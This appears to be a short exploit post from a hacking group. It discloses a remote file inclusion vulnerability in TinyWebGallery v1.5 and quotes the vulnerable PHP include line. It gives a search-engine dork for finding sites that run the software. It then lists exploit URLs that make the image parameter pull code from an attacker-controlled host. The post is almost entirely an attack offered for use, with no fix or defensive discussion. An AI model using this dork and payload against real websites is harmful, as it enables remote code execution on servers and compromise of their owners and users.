C Y B E R - W A R R i O R TIM

TinyWebGallery v1.5 ( image ) Remote Include Vulnerability

------------------------------------------------------------------------
------

Author: xoron

------------------------------------------------------------------------
------

Script: TinyWebGallery

------------------------------------------------------------------------
------

Class: Remote

------------------------------------------------------------------------
------

cont@ct: x0r0n[at]hotmail[dot]com

------------------------------------------------------------------------
------

CODE:

<?php

include ($image . ".txt");

?>

------------------------------------------------------------------------
------

google dork: "powered by twg"

------------------------------------------------------------------------
------

Exploit:

http://www.site.com/[path]/examples/image.php?image=http://evil_scripts

http://www.site.com/[path]/examples/examples/image.php2?image=http://evi
l_scripts?

########################################################################
###

# #

#Greetz: str0ke, Preddy, Iron, x-master, DJR, R3D4C!D and all my friends #

# #

########################################################################
###

[ reply ]